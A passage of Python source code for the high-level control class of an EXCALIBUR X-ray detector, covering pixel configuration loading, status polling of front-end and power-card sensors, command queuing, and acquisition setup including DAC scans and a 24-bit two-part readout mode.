chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n\n time.sleep(1.0)\n\n # Send the command to load the pixel configuration\n logging.debug(\"Sending the load_pixelconfig command...\")\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'discl')\n\n pixel_params = []\n mpx3_pixel_disch = []\n logging.debug(\"Generating mpx3_pixel_disch...\")\n for fem in self._fems:\n chip_ids = self.get_chip_ids(1)\n fem_vals = [self._cb.get_discH(fem)[chip - 1].pixels for chip in chip_ids]\n mpx3_pixel_disch.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_disch', mpx3_pixel_disch,\n 
fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n        with self._comms_lock:\n            self.hl_write_params(pixel_params)\n\n        time.sleep(1.0)\n\n        # Send the command to load the pixel configuration\n        logging.debug(\"Sending the load_pixelconfig command...\")\n        self.hl_do_command('load_pixelconfig')\n\n        for fem in self._fems:\n            self.set_calibration_status(fem, 1, 'disch')\n\n    def status_loop(self):\n        # Status loop has three polling rates: fast, medium and slow\n        # Fast poll fires roughly every 0.1 s; the medium and slow polls every 10 s\n        if self._lv_toggle_required:\n            # Short pause to ensure the power card ID has been set from the low level detector\n            time.sleep(1.0)\n            # We only ever toggle the lv once if required\n            self._lv_toggle_required = False\n            # Perform the toggling of the command bit for lv\n            self.hl_toggle_lv()\n\n        while self._executing_updates:\n            if (datetime.now() - self._startup_time).total_seconds() > 10.0:\n                if self._calibration_required:\n                    try:\n                        self._calibration_required = False\n                        self.update_calibration('lv_enabled', '1')\n                    except Exception:\n                        pass\n            if (datetime.now() - self._slow_update_time).seconds > 10.0:\n                self._slow_update_time = datetime.now()\n                self.slow_read()\n            if (datetime.now() - self._medium_update_time).seconds > 10.0:\n                self._medium_update_time = datetime.now()\n                self.power_card_read()\n            if (datetime.now() - self._fast_update_time).microseconds > 100000:\n                self._fast_update_time = datetime.now()\n                self.fast_read()\n            time.sleep(0.1)\n\n    def queue_command(self, command):\n        #if self._command_lock.acquire(False):\n        self._command_queue.put(command, block=False)\n        #    self._command_lock.release()\n        #else:\n        #    self.set_error(\"Cannot submit command whilst another is active\")\n\n    def command_loop(self):\n        running = True\n        while running:\n            try:\n                command = self._command_queue.get()\n                if command:\n                    with self._command_lock:\n                        self.execute_command(command)\n                else:\n                    running = False\n            except Exception as e:\n                type_, value_, traceback_ = sys.exc_info()\n                ex = traceback.format_exception(type_, value_, traceback_)\n                logging.error(e)\n                self.set_error(\"Unhandled exception: {} => {}\".format(str(e), str(ex)))\n\n    def execute_command(self, command):\n        path = command['path']\n        data = command['data']\n        try:\n            if path in self._param:\n                self._param[path].set_value(data)\n            elif path == 'command/initialise':\n                # Initialise the FEMs\n                logging.debug('Initialise has been called')\n                self.hl_initialise()\n            elif path == 'command/force_calibrate':\n                self.update_calibration('reload', 'manual')\n            elif path == 'command/configure_dac':\n                # Configure the DAC\n                dac_file = self._param['config/test_dac_file'].value\n                logging.debug('Manual DAC calibration has been called with file: %s', dac_file)\n                self.hl_manual_dac_calibration(dac_file)\n            elif path == 'command/configure_mask':\n                # Apply a test mask\n                mask_file = self._param['config/test_mask_file'].value\n                logging.debug('Manual mask file download has been called with file: %s', mask_file)\n                self.hl_test_mask_calibration(mask_file)\n            elif path == 'command/24bit_acquire':\n                # Perform a 24 bit acquisition loop\n                self.hl_do_24bit_acquisition()\n#            elif path == 'command/start_acquisition':\n#                # Starting an acquisition\n#                logging.debug('Start acquisition has been called')\n#                self.hl_arm_detector()\n#                self.do_acquisition()\n#            elif path == 'command/stop_acquisition':\n#                # Stopping an acquisition\n#                logging.debug('Abort acquisition has been called')\n#                self.hl_stop_acquisition()\n            else:\n                super(HLExcaliburDetector, self).set(path, data)\n        except Exception as ex:\n            
self.set_error(str(ex))\n            raise ExcaliburDetectorError(str(ex))\n\n    def get(self, path):\n        with self._param_lock:\n            if path == 'command/initialise':\n                response = {'value': 1}\n            elif path == 'command/force_calibrate':\n                response = {'value': 1}\n            elif path == 'command/configure_dac':\n                response = {'value': 1}\n            elif path == 'command/configure_mask':\n                response = {'value': 1}\n            elif path in self._param:\n                response = self._param[path].get()\n            elif self.search_status(path) is not None:\n                response = {'value': self.search_status(path)}\n                try:\n                    response.update(super(HLExcaliburDetector, self).get(path))\n                except Exception:\n                    # Valid to fail if the get request is for a high level item\n                    pass\n            else:\n                response = super(HLExcaliburDetector, self).get(path)\n\n        return response\n\n    def set(self, path, data):\n        self.clear_error()\n        try:\n            if path == 'command/start_acquisition':\n                # Starting an acquisition\n                logging.debug('Start acquisition has been called')\n                self.hl_arm_detector()\n                self.do_acquisition()\n            elif path == 'command/stop_acquisition':\n                # Stopping an acquisition\n                logging.debug('Abort acquisition has been called')\n                self.hl_stop_acquisition()\n            else:\n                self.queue_command({'path': path, 'data': data})\n        except Exception as ex:\n            self.set_error(str(ex))\n            raise ExcaliburDetectorError(str(ex))\n\n    def set_error(self, err):\n        # Record the error message in the status\n        self._status['error'] = err\n\n    def clear_error(self):\n        # Clear the error message in the status\n        self._status['error'] = \"\"\n\n    def search_status(self, path):\n        items = path.split('/')\n        item_dict = None\n        if items[0] == 'status':\n            try:\n                item_dict = self._status\n                for item in items[1:]:\n                    item_dict = item_dict[item]\n            except KeyError:\n                item_dict = None\n        return item_dict\n\n    def fast_read(self):\n        status = {}\n        with self._param_lock:\n            bit_depth = self._param['config/counter_depth'].value\n            bps = 1\n            if bit_depth == '12':\n                bps = 2\n            elif bit_depth == '24':\n                bps = 4\n            self._status['sensor']['bytes'] = self._status['sensor']['width'] * self._status['sensor']['height'] * bps\n\n        frame_rate = 0.0\n        if not self._24bit_mode:\n            with self._comms_lock:\n                acq_completion_state_mask = 0x40000000\n                # Connect to the hardware\n                if not self.connected:\n                    self.connect({'state': True})\n\n                fem_params = ['frames_acquired', 'control_state']\n\n                read_params = ExcaliburReadParameter(fem_params)\n                self.read_fe_param(read_params)\n\n                while True:\n                    time.sleep(0.01)\n                    if not self.command_pending():\n                        if self._get('command_succeeded'):\n                            logging.info(\"Command has succeeded\")\n                        else:\n                            logging.error(\"Command has failed\")\n                        break\n                vals = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read']['value']\n                logging.info(\"Raw fast read status: %s\", vals)\n                # Calculate the minimum number of frames from the fems, as this will be the actual complete frame count\n                frames_acquired = min(vals['frames_acquired'])\n                self._hw_frames_acquired = frames_acquired\n                #acq_completed = all(\n                #    [((state & acq_completion_state_mask) == acq_completion_state_mask) for state in vals['control_state']]\n                #)\n                if self._acquiring:\n                    # Record the frames acquired\n                    self._frames_acquired = frames_acquired\n                    # We are acquiring so check to see if we have the correct number of frames\n                    if frames_acquired == self._acq_frame_count:\n                        self._acquiring = False\n                        # Acquisition has finished so we must send the stop command\n                        logging.debug(\"stop_acquisition called at end of a complete acquisition\")\n                        self.hl_stop_acquisition()\n                    elif frames_acquired > 
self._acq_frame_count:\n # There has been an error in the acquisition, we should never have too many frames\n self._acquiring = False\n # Acquisition has finished so we must send the stop command\n logging.debug(\"stop_acquisition called at end of a complete acquisition\")\n self.hl_stop_acquisition()\n else:\n if frames_acquired > 0:\n if self._frame_count_time is None:\n self._frame_start_count = frames_acquired\n self._frame_count_time = datetime.now()\n # Check to see if we have timed out\n delta_us = (datetime.now() - self._frame_count_time).microseconds\n delta_s = (datetime.now() - self._frame_count_time).seconds\n frame_rate = float(frames_acquired-self._frame_start_count) / (float(delta_s) + (float(delta_us) / 1000000.0))\n else:\n self._frame_start_count = 0\n self._frame_count_time = None\n frame_rate = 0.0\n\n # We can only time out if we are not waiting for triggers\n if self._param['config/trigger_mode'].index == ExcaliburDefinitions.FEM_TRIGMODE_INTERNAL:\n delta_t = (datetime.now() - self._acq_start_time).seconds\n # Work out the worst case for number of expected frames (assuming 25% plus 5 second startup)\n delta_t -= 5.0\n if delta_t > 0.0:\n expected_frames = int(delta_t / (self._acq_exposure * 1.25))\n logging.debug(\"We would have expected %d frames by now\", expected_frames)\n if expected_frames > frames_acquired:\n #self._acquiring = False\n # Acquisition has finished so we must send the stop command\n #self.set_error(\"stop_acquisition called due to a timeout\")\n logging.debug(\"stop_acquisition called due to a timeout\")\n #self.hl_stop_acquisition()\n\n init_state = []\n for fem_state in self.get('status/fem')['fem']:\n init_state.append(fem_state['state'])\n\n status = {'fem_state': init_state,\n 'frames_acquired': self._frames_acquired,\n 'fem_frames': vals['frames_acquired'],\n 'frame_rate': frame_rate,\n 'acquisition_complete': (not self._acquiring)}\n with self._param_lock:\n self._status.update(status)\n logging.debug(\"Fast update status: %s\", status)\n\n def power_card_read(self):\n with self._comms_lock:\n # Do not perform a slow read if an acquisition is taking place\n if not self._acquiring:\n # Connect to the hardware\n if not self.connected:\n self.connect({'state': True})\n\n powercard_params = ['fe_lv_enable',\n 'fe_hv_enable',\n 'pwr_p5va_vmon',\n 'pwr_p5vb_vmon',\n 'pwr_p5v_fem00_imon',\n 'pwr_p5v_fem01_imon',\n 'pwr_p5v_fem02_imon',\n 'pwr_p5v_fem03_imon',\n 'pwr_p5v_fem04_imon',\n 'pwr_p5v_fem05_imon',\n 'pwr_p48v_vmon',\n 'pwr_p48v_imon',\n 'pwr_p5vsup_vmon',\n 'pwr_p5vsup_imon',\n 'pwr_humidity_mon',\n 'pwr_air_temp_mon',\n 'pwr_coolant_temp_mon',\n 'pwr_coolant_flow_mon',\n 'pwr_p3v3_imon',\n 'pwr_p1v8_imonA',\n 'pwr_bias_imon',\n 'pwr_p3v3_vmon',\n 'pwr_p1v8_vmon',\n 'pwr_bias_vmon',\n 'pwr_p1v8_imonB',\n 'pwr_p1v8_vmonB',\n 'pwr_coolant_temp_status',\n 'pwr_humidity_status',\n 'pwr_coolant_flow_status',\n 'pwr_air_temp_status',\n 'pwr_fan_fault']\n fe_params = powercard_params\n read_params = ExcaliburReadParameter(fe_params, fem=self.powercard_fem_idx+1)\n self.read_fe_param(read_params)\n\n while True:\n time.sleep(0.1)\n if not self.command_pending():\n if self._get('command_succeeded'):\n logging.info(\"Command has succeeded\")\n status = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read'][\n 'value']\n with self._param_lock:\n # Check for the current HV enabled state\n hv_enabled = 0\n # Greater than hv_bias means the HV is enabled\n if status['pwr_bias_vmon'][0] > self._param['config/hv_bias'].value - 5.0:\n 
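# a bias monitor reading within 5 V of the requested hv_bias is taken to mean the HV is on\n                                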
hv_enabled = 1\n self._status['hv_enabled'] = hv_enabled\n\n for param in powercard_params:\n if param in status:\n val = status[param]\n if isinstance(val, list):\n self._status[param] = val[0]\n else:\n self._status[param] = val\n else:\n logging.error(\"Command has failed\")\n with self._param_lock:\n for param in powercard_params:\n self._status[param] = None\n break\n logging.debug(\"Power card update status: %s\", self._status)\n\n def slow_read(self):\n status = {}\n with self._comms_lock:\n # Do not perform a slow read if an acquisition is taking place\n if not self._acquiring:\n # Connect to the hardware\n if not self.connected:\n self.connect({'state': True})\n\n fem_params = ['fem_local_temp', 'fem_remote_temp', 'moly_temp', 'moly_humidity']\n supply_params = ['supply_p1v5_avdd1', 'supply_p1v5_avdd2', 'supply_p1v5_avdd3', 'supply_p1v5_avdd4',\n 'supply_p1v5_vdd1', 'supply_p2v5_dvdd1']\n\n fe_params = fem_params + supply_params + ['mpx3_dac_out']\n\n read_params = ExcaliburReadParameter(fe_params)\n self.read_fe_param(read_params)\n\n while True:\n time.sleep(0.1)\n if not self.command_pending():\n if self._get('command_succeeded'):\n logging.info(\"Command has succeeded\")\n status = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read'][\n 'value']\n with self._param_lock:\n lv_enabled = 1\n for param in fe_params:\n if param in status:\n val = []\n if param in supply_params:\n for item in status[param]:\n if item != 1:\n val.append(0)\n else:\n val.append(1)\n else:\n if param == 'moly_temp' or param == 'moly_humidity':\n for item in status[param]:\n if item < 0.0:\n val.append(None)\n lv_enabled = 0\n else:\n val.append(item)\n else:\n val = status[param]\n self._status[param] = val\n # Catch when the lv has been enabled and attempt to re-send calibration\n # Also do not return the humidity right away as it has a settling time\n if self._status['lv_enabled'] == 0 and lv_enabled == 1:\n self._calibration_required = True\n self._moly_humidity_counter = 3\n if self._moly_humidity_counter > 0:\n self._status['moly_humidity'] = self._default_status\n self._moly_humidity_counter -= 1\n self._status['lv_enabled'] = lv_enabled\n else:\n logging.info(\"Command has failed\")\n with self._param_lock:\n for param in fe_params:\n self._status[param] = self._default_status\n logging.error('Command read_fe_param failed on following FEMS:')\n fem_error_count = 0\n for (idx, fem_id, error_code, error_msg) in self.get_fem_error_state():\n if error_code != 0:\n logging.error(\n ' FEM idx {} id {} : {} : {}'.format(idx, fem_id, error_code, error_msg))\n fem_error_count += 1\n err_msg = 'Command read_fe_param failed on {} FEMs'.format(fem_error_count)\n self.set_error(err_msg)\n\n #if param in status:\n # self._status[param] = status[param]\n break\n\n if not self._read_efuse_ids:\n # Only read the efuse IDs if the LV is enabled\n if self._status['lv_enabled'] == 1:\n response_status, efuse_dict = self.hl_efuseid_read()\n self._status.update(efuse_dict)\n logging.debug(\"EFUSE return status: %s\", response_status)\n if response_status == 0:\n self._read_efuse_ids = True\n\n logging.debug(\"Slow update status: %s\", self._status)\n\n def hl_arm_detector(self):\n # Perform all of the actions required to get the detector ready for an acquisition\n with self._comms_lock:\n self.clear_error()\n\n # Start by downloading the UDP configuration\n self.hl_load_udp_config('arming', self._param['config/udp_file'].value)\n\n\n def hl_do_dac_scan(self):\n\n logging.info(\"Executing DAC 
scan ...\")\n\n # Build a list of parameters to be written toset up the DAC scan\n scan_params = []\n\n scan_dac = self._param['config/scan_dac_num'].value\n logging.info(' Setting scan DAC to {}'.format(scan_dac))\n scan_params.append(ExcaliburParameter('dac_scan_dac', [[scan_dac]]))\n\n scan_start = self._param['config/scan_dac_start'].value\n logging.info(' Setting scan start value to {}'.format(scan_start))\n scan_params.append(ExcaliburParameter('dac_scan_start', [[scan_start]]))\n\n scan_stop = self._param['config/scan_dac_stop'].value\n logging.info(' Setting scan stop value to {}'.format(scan_stop))\n scan_params.append(ExcaliburParameter('dac_scan_stop', [[scan_stop]]))\n\n scan_step = self._param['config/scan_dac_step'].value\n logging.info(' Setting scan step size to {}'.format(scan_step))\n scan_params.append(ExcaliburParameter('dac_scan_step', [[scan_step]]))\n\n # Record the acquisition exposure time\n self._acq_exposure = self._param['config/exposure_time'].value\n\n acquisition_time = int(self._param['config/exposure_time'].value * 1000.0)\n logging.info(' Setting acquisition time to {} ms'.format(acquisition_time))\n scan_params.append(ExcaliburParameter('acquisition_time', [[acquisition_time]]))\n\n\n readout_mode = ExcaliburDefinitions.FEM_READOUT_MODE_SEQUENTIAL\n logging.info(' Setting ASIC readout mode to {}'.format(\n ExcaliburDefinitions.readout_mode_name(readout_mode)\n ))\n scan_params.append(ExcaliburParameter('mpx3_readwritemode', [[readout_mode]]))\n\n colour_mode = self._param['config/colour_mode']\n logging.info(' Setting ASIC colour mode to {} '.format(colour_mode.value))\n scan_params.append(ExcaliburParameter('mpx3_colourmode', [[colour_mode.index]]))\n\n csmspm_mode = self._param['config/csm_spm_mode']\n logging.info(' Setting ASIC pixel mode to {} '.format(csmspm_mode.value))\n scan_params.append(ExcaliburParameter('mpx3_csmspmmode', [[csmspm_mode.index]]))\n\n disc_csm_spm = self._param['config/disc_csm_spm']\n logging.info(' Setting ASIC discriminator output mode to {} '.format(disc_csm_spm.value))\n scan_params.append(ExcaliburParameter('mpx3_disccsmspm', [[disc_csm_spm.index]]))\n\n equalization_mode = self._param['config/equalization_mode']\n logging.info(' Setting ASIC equalization mode to {} '.format(equalization_mode.value))\n scan_params.append(ExcaliburParameter('mpx3_equalizationmode', [[equalization_mode.index]]))\n\n gain_mode = self._param['config/gain_mode']\n logging.info(' Setting ASIC gain mode to {} '.format(gain_mode.value))\n scan_params.append(ExcaliburParameter('mpx3_gainmode', [[gain_mode.index]]))\n\n counter_select = self._param['config/counter_select'].value\n logging.info(' Setting ASIC counter select to {} '.format(counter_select))\n scan_params.append(ExcaliburParameter('mpx3_counterselect', [[counter_select]]))\n\n counter_depth = self._param['config/counter_depth'].value\n logging.info(' Setting ASIC counter depth to {} bits'.format(counter_depth))\n scan_params.append(ExcaliburParameter('mpx3_counterdepth',\n [[ExcaliburDefinitions.FEM_COUNTER_DEPTH_MAP[counter_depth]]]))\n\n operation_mode = ExcaliburDefinitions.FEM_OPERATION_MODE_DACSCAN\n logging.info(' Setting operation mode to {}'.format(\n ExcaliburDefinitions.operation_mode_name(operation_mode)\n ))\n scan_params.append(ExcaliburParameter('mpx3_operationmode', [[operation_mode]]))\n\n lfsr_bypass_mode = ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_DISABLED\n logging.info(' Setting LFSR bypass mode to {}'.format(\n 
ExcaliburDefinitions.lfsr_bypass_mode_name(lfsr_bypass_mode)\n        ))\n        scan_params.append(ExcaliburParameter('mpx3_lfsrbypass', [[lfsr_bypass_mode]]))\n\n        logging.info('  Disabling local data receiver thread')\n        scan_params.append(ExcaliburParameter('datareceiver_enable', [[0]]))\n\n        # Write all the parameters to system\n        logging.debug('Writing configuration parameters to system {}'.format(str(scan_params)))\n        self.hl_write_params(scan_params)\n\n        self._frame_start_count = 0\n        self._frame_count_time = None\n\n        # Send start acquisition command\n        logging.debug('Sending start acquisition command')\n        self.hl_start_acquisition()\n        logging.debug('Start acquisition completed')\n\n    def do_acquisition(self):\n        with self._comms_lock:\n            self.clear_error()\n            if self._hw_frames_acquired > 0:\n                # Counters have not cleared yet, send a stop acquisition before restarting\n                self.hl_stop_acquisition()\n\n            # Set the acquiring flag\n            self._acquiring = True\n            self._acq_start_time = datetime.now()\n            status = {'acquisition_complete': (not self._acquiring)}\n            self._status.update(status)\n            # Resolve the acquisition operating mode appropriately, handling burst and matrix read if necessary\n            operation_mode = self._param['config/operation_mode']\n\n            # Check if the operational mode is DAC scan.\n            if operation_mode.index == ExcaliburDefinitions.FEM_OPERATION_MODE_DACSCAN:\n                logging.debug('DAC scan requested so entering DAC scan mode')\n                self.hl_do_dac_scan()\n                return\n\n            # if self.args.burst_mode:\n            #     operation_mode = ExcaliburDefinitions.FEM_OPERATION_MODE_BURST\n            #\n            # if self.args.matrixread:\n            #     if self.args.burst_mode:\n            #         logging.warning('Cannot select burst mode and matrix read simultaneously, ignoring burst option')\n            #     operation_mode = ExcaliburDefinitions.FEM_OPERATION_MODE_MAXTRIXREAD\n            #\n\n            num_frames = self._param['config/num_images'].value\n            image_mode = self._param['config/image_mode'].value\n            logging.info('  Image mode set to {}'.format(image_mode))\n            # Check for single image mode\n            if image_mode == ExcaliburDefinitions.FEM_IMAGEMODE_NAMES[0]:\n                # Single image mode requested, set num frames to 1\n                logging.info('  Single image mode, setting number of frames to 1')\n                num_frames = 1\n            logging.info('  Setting number of frames to {}'.format(num_frames))\n\n\n\n            # Temporary 24 bit mode setup\n            # TODO: Remove this once 24 bit mode has been implemented within the firmware\n            # 24-bit reads are a special case, so set things up appropriately in this mode\n            logging.info(\"config/counter_depth value: {}\".format(self._param['config/counter_depth'].value))\n            if int(self._param['config/counter_depth'].value) == 24:\n                self._24bit_mode = True\n\n                # Force counter select to C1, C0 is read manually afterwards\n                self._param['config/counter_select'].set_value(1, callback=False)\n\n                # For acquisitions with > 1 frame, run multiple acquisition loops instead\n                self._acquisition_loops = num_frames\n                num_frames = 1\n                logging.info(\"Configuring 24-bit acquisition with {} 1-frame loops\".format(self._acquisition_loops))\n\n                # In 24-bit mode, force a reset of the UDP frame counter before first acquisition loop\n                logging.info('Resetting UDP frame counter for 24 bit mode')\n                cmd_ok, err_msg = self.hl_do_command('reset_udp_counter')\n                logging.info(\"{} => {}\".format(cmd_ok, err_msg))\n                if not cmd_ok:\n                    logging.error(\"UDP counter reset failed: {}\".format(err_msg))\n                    return\n            else:\n                self._24bit_mode = False\n            # End of 24 bit mode\n\n            # Build a list of parameters to be written to the system to set up acquisition\n            write_params = []\n\n            
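# Illustration of the parameter convention used below (the example value is\n            # hypothetical): each ExcaliburParameter pairs a parameter name with a\n            # list-of-lists payload, e.g. ExcaliburParameter('mpx3_gainmode', [[2]]),\n            # where a single inner list applies the same value across FEMs, while a\n            # per-FEM write carries one inner list per FEM, as in the commented-out\n            # '[[addr] for addr in self.source_data_addr]' lines further below.\n            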
tp_count = self._param['config/num_test_pulses'].value\n logging.info(' Setting test pulse count to {}'.format(tp_count))\n write_params.append(ExcaliburParameter('mpx3_numtestpulses', [[tp_count]]))\n tp_enable = self._param['config/test_pulse_enable']\n logging.info(' Setting test pulse enable to {}'.format(tp_enable.value))\n write_params.append(ExcaliburParameter('testpulse_enable', [[tp_enable.index]]))\n\n write_params.append(ExcaliburParameter('num_frames_to_acquire', [[num_frames]]))\n\n # Record the number of frames for this acquisition\n self._acq_frame_count = num_frames\n\n # Record the acquisition exposure time\n self._acq_exposure = self._param['config/exposure_time'].value\n\n acquisition_time = int(self._param['config/exposure_time'].value * 1000.0)\n logging.info(' Setting acquisition time to {} ms'.format(acquisition_time))\n write_params.append(ExcaliburParameter('acquisition_time', [[acquisition_time]]))\n\n trigger_mode = self._param['config/trigger_mode']\n logging.info(' Setting trigger mode to {}'.format(trigger_mode.value))\n write_params.append(ExcaliburParameter('mpx3_externaltrigger', [[trigger_mode.index]]))\n\n trigger_polarity = self._param['config/trigger_polarity']\n logging.info(' Setting trigger polarity to {}'.format(trigger_polarity.value))\n write_params.append(ExcaliburParameter('mpx3_triggerpolarity', [[trigger_polarity.index]]))\n\n read_write_mode = self._param['config/read_write_mode']\n logging.info(' Setting ASIC readout mode to {}'.format(read_write_mode.value))\n write_params.append(ExcaliburParameter('mpx3_readwritemode', [[read_write_mode.index]]))\n\n colour_mode = self._param['config/colour_mode']\n logging.info(' Setting ASIC colour mode to {} '.format(colour_mode.value))\n write_params.append(ExcaliburParameter('mpx3_colourmode', [[colour_mode.index]]))\n\n csmspm_mode = self._param['config/csm_spm_mode']\n logging.info(' Setting ASIC pixel mode to {} '.format(csmspm_mode.value))\n write_params.append(ExcaliburParameter('mpx3_csmspmmode', [[csmspm_mode.index]]))\n\n equalization_mode = self._param['config/equalization_mode']\n logging.info(' Setting ASIC equalization mode to {} '.format(equalization_mode.value))\n write_params.append(ExcaliburParameter('mpx3_equalizationmode', [[equalization_mode.index]]))\n\n gain_mode = self._param['config/gain_mode']\n logging.info(' Setting ASIC gain mode to {} '.format(gain_mode.value))\n write_params.append(ExcaliburParameter('mpx3_gainmode', [[gain_mode.index]]))\n\n counter_select = self._param['config/counter_select'].value\n logging.info(' Setting ASIC counter select to {} '.format(counter_select))\n write_params.append(ExcaliburParameter('mpx3_counterselect', [[counter_select]]))\n\n counter_depth = self._param['config/counter_depth'].value\n logging.info(' Setting ASIC counter depth to {} bits'.format(counter_depth))\n write_params.append(ExcaliburParameter('mpx3_counterdepth',\n [[ExcaliburDefinitions.FEM_COUNTER_DEPTH_MAP[counter_depth]]]))\n\n disc_csm_spm = self._param['config/disc_csm_spm']\n int_counter_depth = ExcaliburDefinitions.FEM_COUNTER_DEPTH_MAP[counter_depth]\n csm_spm_value = ExcaliburDefinitions.DISC_SPM_CSM_TABLE[int_counter_depth][csmspm_mode.index][disc_csm_spm.index][read_write_mode.index][counter_select]\n logging.info(' Setting ASIC discriminator output mode to {} '.format(csm_spm_value))\n write_params.append(ExcaliburParameter('mpx3_disccsmspm', [[csm_spm_value]]))\n\n logging.info(' Setting operation mode to {}'.format(operation_mode.value))\n 
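# The five indices into DISC_SPM_CSM_TABLE above are, in order: the mapped\n            # counter depth, CSM/SPM mode, discriminator output mode, read/write mode\n            # and counter select; the table resolves the mpx3_disccsmspm value that\n            # is actually written to the ASICs for that combination of settings.\n            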
write_params.append(ExcaliburParameter('mpx3_operationmode', [[operation_mode.index]]))\n\n lfsr_bypass = self._param['config/lfsr_bypass']\n logging.info(' Setting LFSR bypass mode to {}'.format(lfsr_bypass.value))\n write_params.append(ExcaliburParameter('mpx3_lfsrbypass', [[lfsr_bypass.index]]))\n\n #\n # if self.args.matrixread:\n # lfsr_bypass_mode = ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_ENABLED\n # else:\n # lfsr_bypass_mode = ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_DISABLED\n #\n #logging.info(' Setting data interface address and port parameters')\n #write_params.append(ExcaliburParameter('source_data_addr', [[addr] for addr in self.source_data_addr]))\n #write_params.append(ExcaliburParameter('source_data_mac', [[mac] for mac in self.source_data_mac]))\n #write_params.append(ExcaliburParameter('source_data_port', [[port] for port in self.source_data_port]))\n #write_params.append(ExcaliburParameter('dest_data_addr', [[addr] for addr in self.dest_data_addr]))\n #write_params.append(ExcaliburParameter('dest_data_mac', [[mac] for mac in self.dest_data_mac]))\n #write_params.append(ExcaliburParameter('dest_data_port', [[port] for port in self.dest_data_port]))\n\n logging.info(' Disabling local data receiver thread')\n write_params.append(ExcaliburParameter('datareceiver_enable', [[0]]))\n\n # Connect to the hardware\n # self.connect({'state': True})\n\n if self._24bit_mode:\n self._24bit_params = write_params\n # Create and queue the command object\n cmd = {\n 'path': 'command/24bit_acquire',\n 'data': {}\n }\n self.queue_command(cmd)\n\n else:\n # Write all the parameters to system\n logging.info('Writing configuration parameters to system {}'.format(str(write_params)))\n self.hl_write_params(write_params)\n\n self._frame_start_count = 0\n self._frame_count_time = None\n\n # Send start acquisition command\n logging.info('Sending start acquisition command')\n self.hl_start_acquisition()\n logging.info('Start acquisition completed')\n\n def hl_do_24bit_acquisition(self):\n logging.info('24 bit mode acquisition loop entered...')\n for acq_loop in range(self._acquisition_loops):\n\n self._frame_start_count = 0\n self._frame_count_time = None\n\n logging.info(\n 'Executing acquisition loop {} of {}...'.format(acq_loop + 1, self._acquisition_loops)\n )\n\n # Write all the parameters to system\n logging.info('Writing configuration parameters to system')\n self.hl_write_params(self._24bit_params)\n\n # Send start acquisition command\n logging.info('Sending part 1 start acquisition command')\n self.hl_start_acquisition()\n\n logging.info(\"Waiting for part 1 acquisition to complete\")\n self.wait_for_24bit_acquisition_completion(0x40000000)\n logging.info(\"Part 1 acquisition has completed\")\n\n self.do_c0_matrix_read()\n logging.info('Acquisition of 24 bit frame completed')\n\n # Holding the standard acquiring flag true until all loops have completed\n self._acquiring = False\n # Reset 24bit mode flag so that fast read can read\n self._24bit_mode = False\n logging.info(\"Completed {} acquisition loops\".format(self._acquisition_loops))\n\n def do_c0_matrix_read(self):\n logging.info('Performing a C0 matrix read for 24 bit mode')\n\n c0_read_params = []\n c0_read_params.append(ExcaliburParameter(\n 'mpx3_operationmode', [[ExcaliburDefinitions.FEM_OPERATION_MODE_MAXTRIXREAD]]\n ))\n # Reset counter select back to C0\n self._param['config/counter_select'].set_value(0, callback=False)\n\n c0_read_params.append(ExcaliburParameter('mpx3_counterselect', [[0]]))\n 
c0_read_params.append(ExcaliburParameter('num_frames_to_acquire', [[1]]))\n        c0_read_params.append(ExcaliburParameter('mpx3_lfsrbypass', [[0]]))\n\n        logging.info(\"Sending configuration parameters for C0 matrix read\")\n        self.hl_write_params(c0_read_params)\n\n        logging.info(\"Sending part 2 start acquisition command\")\n        self.hl_start_acquisition()\n\n        logging.info(\"Waiting for part 2 acquisition to complete\")\n        self.wait_for_24bit_acquisition_completion(0x1f)\n        logging.info(\"Part 2 acquisition has completed\")\n\n\n    def wait_for_24bit_acquisition_completion(self, acq_completion_state_mask):\n        fem_params = ['frames_acquired', 'control_state']\n        while True:\n            read_params = ExcaliburReadParameter(fem_params)\n            cmd_ok, err_msg, vals = self.hl_read_params(read_params)\n\n            acq_completed = all(\n                [((state & acq_completion_state_mask) == acq_completion_state_mask) for state in vals['control_state']]\n            )\n            if acq_completed:\n                break\n\n        self.hl_stop_acquisition()\n\n    def hl_initialise(self):\n        logging.info(\"Initialising front end...\")\n        for fem in self._fems:\n            self.set_calibration_status(fem, 0)\n        logging.info(\"Sending a fe_vdd_enable param set to 1\")\n        params = []\n        params.append(ExcaliburParameter('fe_vdd_enable', [[1]], fem=self.powercard_fem_idx+1))\n        self.hl_write_params(params)\n        logging.info(\"Sending the fe_init command\")\n        self.hl_do_command('fe_init')\n        logging.info(\"Sending a stop acquisition\")\n        return self.hl_stop_acquisition()\n\n    def hl_toggle_lv(self):\n        logging.info(\"Toggling lv_enable 1,0\")\n        for fem in self._fems:\n            self.set_calibration_status(fem, 0)\n        if self.powercard_fem_idx < 0:\n            self.set_error(\"Unable to toggle LV enable as server reports no power card\")\n            return\n        params = [ExcaliburParameter('fe_lv_enable', [[1]], fem=self.powercard_fem_idx+1)]\n        self.hl_write_params(params)\n        params = [ExcaliburParameter('fe_lv_enable', [[0]], fem=self.powercard_fem_idx+1)]\n        self.hl_write_params(params)\n\n    def hl_lv_enable(self, name, lv_enable):\n        logging.info(\"Setting lv_enable to %d\", lv_enable)\n        for fem in self._fems:\n            self.set_calibration_status(fem, 0)\n        if self.powercard_fem_idx < 0:\n            self.set_error(\"Unable to set LV enable [{}] as server reports no power card\".format(name))\n            return\n        params = []\n        params.append(ExcaliburParameter('fe_lv_enable', [[lv_enable]], fem=self.powercard_fem_idx+1))\n        self.hl_write_params(params)\n        if lv_enable == 1:\n            self.hl_initialise()\n\n    def hl_hv_enable(self, name, hv_enable):\n        logging.info(\"Setting hv_enable to %d\", hv_enable)\n        if self.powercard_fem_idx < 0:\n            self.set_error(\"Unable to set HV enable [{}] as server reports no power card\".format(name))\n            return\n        params = []\n        params.append(ExcaliburParameter('fe_hv_enable', [[hv_enable]], fem=self.powercard_fem_idx+1))\n        self.hl_write_params(params)\n\n    def 